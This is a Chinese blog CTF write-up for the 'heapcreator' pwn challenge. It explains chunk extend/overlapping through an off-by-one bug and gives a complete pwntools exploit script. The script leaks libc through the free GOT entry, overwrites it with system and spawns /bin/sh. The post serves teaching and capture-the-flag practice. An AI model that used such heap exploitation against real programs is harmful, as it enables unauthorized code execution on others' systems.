Chunk Extend-overlapping_hitcontraining_heapcreator

已于 2024-08-21 23:14:48 修改
阅读量226 收藏 5
点赞数 3
文章标签: 网络 安全 linux
于 2024-08-21 23:12:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhuo1358/article/details/141403548
版权
原理

通过修改chunk中的size的大小,从而让块向前或后延申,与后面的块造成重叠,来对extend的块的内容进行操作

例题:heapcreator

这个程序有5个模块

creat_heap模块

这个模块是在heaparray+i处用malloc申请了一个堆块,并且是先构造了结构体再申请的

大小存在heaparray+i

edit_heap模块

这个模块可以对已创建的堆进行编辑

可以看到这里在修改内容的时候,输入的大小比创建时多了1,造成了off_by_one漏洞

delete_heap模块

这个模块比较的简单,输入index来删除对应的堆

因为这个是先free内容部分,再free掉结构体,如果我们把free改成system,内容输入/bin/sh即可getshell

show_heap模块

这个模块为了打印堆的内容

思路

首先我们先创建好第一个heap来部署/bin/sh,再运用off_by_one漏洞来造成overlapping

payload='/bin/sh\x00'
payload=payload.ljust(0x18,'a')
creat(24,payload)
py2=b'a'*16
creat(16,py2)
py3='/bin/sh\x00'
py3=py3.ljust(0x18,'a')+'\x41'
edit(0,py3)
delete(1)

如果进行off_by_one的话可以修改下一个heap结构体的大小,来对下一个heap的内容部分extend

然后我们释放掉再重启就可以对他的内容进行操作

先随便重启一个heap

可以看到这个时候结构体是在内容的下面的

那么我们就可以把结构体的地址覆盖成free来泄露libc

creat(0x30,p64(0)*4 +p64(0x30) +  p64(free) #
printf(1)
real=u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print(hex(real))
printf(1)
base=real-libc.sym['free']
system=base+libc.sym['system']

我们的edit_heap模块也是根据结构体来定位从而修改内容大小

所以直接把内容修改为system即可

edit(1,p64(system))
delete(0)

 

exp
from pwn import*
io=process('./heapcreator')
#io=remote('node5.buuoj.cn','27684')
context(arch='amd64',os='linux',log_level='debug')
elf=ELF('./heapcreator')
libc=ELF('./libc-2.23.so')
free=elf.got['free']
def creat(size,payload):
	io.recvuntil("Your choice :")
	io.sendline('1')
	io.recvuntil("Size of Heap : ")
	io.sendline(str(size))
	io.recvuntil("Content of heap:")
	io.sendline(payload)
def edit(index,content):
	io.recvuntil("Your choice :")
	io.sendline('2')
	io.recvuntil("Index :")
	io.sendline(str(index))
	io.recvuntil("Content of heap : ")
	io.sendline(content)
def printf(index):
	io.recvuntil("Your choice :")
	io.sendline('3')
	io.recvuntil("Index :")
	io.sendline(str(index))
def delete(index):
	io.recvuntil("Your choice :")
	io.sendline('4')
	io.recvuntil("Index :")
	io.sendline(str(index))
#gdb.attach(io)
payload='/bin/sh\x00'
payload=payload.ljust(0x18,'a')
creat(24,payload)
py2=b'a'*16
creat(16,py2)
py3='/bin/sh\x00'
py3=py3.ljust(0x18,'a')+'\x41'
edit(0,py3)
delete(1)
creat(0x30,p64(0)*4 +p64(0x30) +  p64(free)) #
printf(1)
real=u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print(hex(real))
printf(1)
base=real-libc.sym['free']
system=base+libc.sym['system']
edit(1,p64(system))
delete(0)
io.interactive()
#pause()

呀卡吗洗.
关注
how2heap-2.23-09-chunk_extend_and_overlapping
blind cat
01-06 409
原因:符合fastbin chunk大小的chunk被释放时,只根据chunk的size将其放入到特定的fastbinY中。
Chunk Extend,double_free)hitcontraining_heapcreator,babyheap_0ctf_2017
weixin_61283545的博客
06-29 154
这道题,触及到了一个新知识Chunk Extend具体文章可以参考好好说话之Chunk Extend/Overlapping_hollk的博客-CSDN博客 tql审核代码的时候我们可以分析出大概题目申请堆块是,先申请一个计数堆块之后计数对快的指针会指向一个大小我们规定的内容堆块。正常浏览后发现了在edit函数下有一个off by null漏洞,就是多溢出一个字节为什么要用到chunk extend让我苦恼了很久,大概可以总结为一方面只能溢出一个字节我们就会想去常规的伪造堆块,可是伪造时候需要对齐,但是我们
Chunk Extend/Overlapping | 堆拓展、重叠
SkYe's Blog
08-06 1840
堆拓展&溢出 绝大部分内容来自 CTF-WIKI ,内容引用用于学习记录 介绍 chunk extend 是堆漏洞的一种常见利用手法,通过 extend 可以实现 chunk overlapping 的效果。这种利用方法需要以下的时机和条件: 程序中存在基于堆的漏洞 漏洞可以控制 chunk header 中的数据 原理 chunk extend 技术能够产生的原因在于 ptmalloc 在对堆 chunk 进行操作时使用的各种宏。 在 ptmalloc 中,获取 chunk 块大小的操作如
Chunk Extend and Overlapping
Grxer的博客
03-20 127
这样我们的 *heap会申请到0x20的chunk,content会申请到0x40的chunk,我们的0x40chunk会overlap到0x20的chunk,从而控制其内容,我们把他的content指针改为got就,可以在show的时候输出地址。会在main()函数调用前执行,这样可以通过修该地址的指针来将控制流指向病毒或者寄生代码,因为比main执行还早,大部分恶意软件都是hook这个,感觉c++的构造函数或许和这个相关。这样我们就可以改写这个main的返回地址为one_gadget地址。
好好说话之Chunk Extend/Overlapping
hollk’s blog
09-04 4980
这是进入堆领域的第二个知识点,Chunk Extend/Overlapping。不知道正在看这篇文章的你有没有一些拓展的思想,在了解堆的基础知识后有没有自己想过在堆中可能存在问题的点。我们可能从做第一道pwn题开始就知道要溢出、要泄露、要拿flag、拿shell,在知道了这些技巧之后看到shell这道题就过去了,可能也没想过为什么会这样,往往这些我们不在乎的东西才是同比场景的方法和思路 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
buuctf hitcontraining_heapcreator HITCON Trainging lab13
weixin_45677731的博客
08-10 1059
这一题在wiki上面是有的,在Chunk Extend and Overlapping里面,个人觉得这一题对于我这种刚开始学习堆的人来说,是比较容易理解的一题 拖进IDA create_heap函数: 值得注意的是,他这里是会有两次malloc的,也就是说,你申请了一次,他就会创建两个chunk,第一个chunk是0x20大小的,可以看作是记录的作用,里面存放着第二个chunk的size和指针,同时,第一个chunk的地址指针保存在bss段中,heaparray数组这里: 这样表述起来可能不太清晰,我申
linux_pwn(3)--Chunk Extend and Overlapping&&roarctf_2019_easy_pwn
azraelxuemo的博客
03-07 3613
文章目录What is Chunk Extend and Overlappingpwn题思路例题保护机制add函数show函数delete函数edit函数开始做题准备框架调试覆盖后面一个块的大小释放堆块free验证机制尝试修改堆块开始泄露libc任意地址写总结 What is Chunk Extend and Overlapping Chunk Extend and Overlapping就是当我们可以控制chunk的header时候,通过修改原有块的头大小,产生堆块重叠 比如说原来的两个堆块都是0x21
Chunk Extend and Overlapping学习
zyxx_wjc的博客
04-08 611
最近打算把堆利用的知识巩固一下,复习大纲依托于CTFwiki。对上面的知识和内容稍作了整理,也方便复习。 Chunk Extend and Overlapping,即让堆块大小拓展,以实现堆块重叠,便于下一步的利用。这一手法的基本原理是这两个宏: /* Get size, ignoring use bits */ #define chunksize(p) (chunksize_nomask(p) & ~(SIZE_BITS)) /* Like chunksize, but do not ma
堆学习笔记-chunk overlapping
N1rvana的博客
11-14 489
CTF-wiki真是太好一学习网站了。 原文链接:https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/chunk-extend-overlapping/#_1 Chunk Extend 实现条件 要实现chunk extend需要满足的条件:有堆漏洞,并且该漏洞可以修改chunk header里的数据。 实现原理 原理大概就是: ①:ptmalloc通过chunk header里面的prev_size和size来对前后堆块进行定位。 ②:ptmal
HITCON Trainging lab13 学习Chunk Extend and Overlapping 攻击
qq_36495104的博客
05-08 268
查看保护措施,RelRO为Partial,即可以修改GOT表项 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-znarZnkX-1588937420199)(F:\wangpei\笔记\pwn\note\assets\1588837137968.png)] 这个题目,定义了一种heap结构体,大概如下 struct heap { size; #heap的大小;8字节 content; #指针,指向content;8字节 } 下面是main函数,定义了菜单选
ffplay 参数详解(基于版本4.0.1)
智眸之音
07-31 7897
Simple media player usage: ffplay [options] input_file Main options: -L                  show license -h topic            show help -? topic            show help -help topic         show help --help ...
0ctf-2018 heapstorm2详解
极目楚天舒的博客
05-20 2174
0x01 预备知识堆相关的数据结构通过malloc得到的我们称之为chunk,每一个chunk都有一个chunk头用于管理称之为malloc_chunk,定义如下:/* This struct declaration is misleading (but accurate and necessary). It declares a "view" into memory allowing a...
vsb asc_vsb电力线故障检测kaggle竞争
weixin_26704853的博客
09-06 1804
vsb asc 案例研究概述: (Overview of the case study:) Step 1: Explanation of the problem which includes details about the source, problem statement, explanation of relevant terms, and how the problem can be v...
信息安全铁人三项赛真题解析_对 [CrackMe] 【ctf】2018信息安全铁人三项赛个人赛总决赛赛题分享 的一些补充...
weixin_39587238的博客
12-30 530
原贴主地址:https://www.52pojie.cn/thread-837939-1-1.htmllittenote这道题的exp#------------------------------------------------------------------------------------------------------------------------------------...
MQTT--EMQX入门+MQTTX使用
最新发布
CJPSR的博客
09-30 651
EMQ X基于 Erlang/OTP 平台开发的MQTT 消息服务器,是开源社区中最流行的 MQTT 消息服务器。EMQ X 是开源百万级分布式。
信息安全对抗演习:应对网络威胁的坚实防线
dexun123的博客
09-29 690
演习结束后,需要对整个演习过程进行总结和评估。分析演习中发现的问题和不足并提出改进措施;同时总结经验教训为未来的演习提供参考。
2024ICPC网络赛2记录:CK
zsyzClb的博客
09-25 386
不过看到异或就知道这个异或肯定不是白给你的,大概就是用字典树,一开始我以为是把两个数组分开建字典树,后面发现要一起建,然后就想到用dp来维护。这一把我们三个人手感都很好,前六题都是一遍过,然后我又切掉了非签到的E和C,最后时间不是很多,K只想到大概字典树的思路,细节不是很懂就直接开冲,当然是没有冲出来。我们想了很多错误的思路以后才开始思考kmp,然后就想到了可以一直跳kmp,只需要把相同的合并起来,如果能匹配的就全部一起跳过,不匹配的就直接删掉,时间复杂度O(n)。看上去要求某种匹配数的个数,有点吓人。
通信工程学习:什么是LAN局域网、MAN城域网、WAN广域网
limengshi138392的博客
09-29 651
通信工程学习:什么是LAN局域网、MAN城域网、WAN广域网
Unhandled Rejection (ChunkLoadError): Loading chunk mf-dep_vendors-node_modules_ant-design_pro-provider_es_index_js-node_modules_ant-design_pro-utils_es-222108 failed.
06-13
这个错误通常是由于网络不稳定或浏览器缓存问题导致的。您可以尝试以下解决方法: 1. 清除浏览器缓存并重新加载页面。 2. 检查网络连接是否正常,尝试重新连接互联网。 3. 如果您使用的是代理服务器,请尝试禁用代理服务器或使用其他代理服务器。 4. 如果问题仍然存在,请尝试使用其他浏览器或设备访问该页面,看看是否可以解决问题。 5. 如果您是网站管理员,请检查您的网站是否存在任何错误,例如文件丢失或损坏,以及服务器是否正常运行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值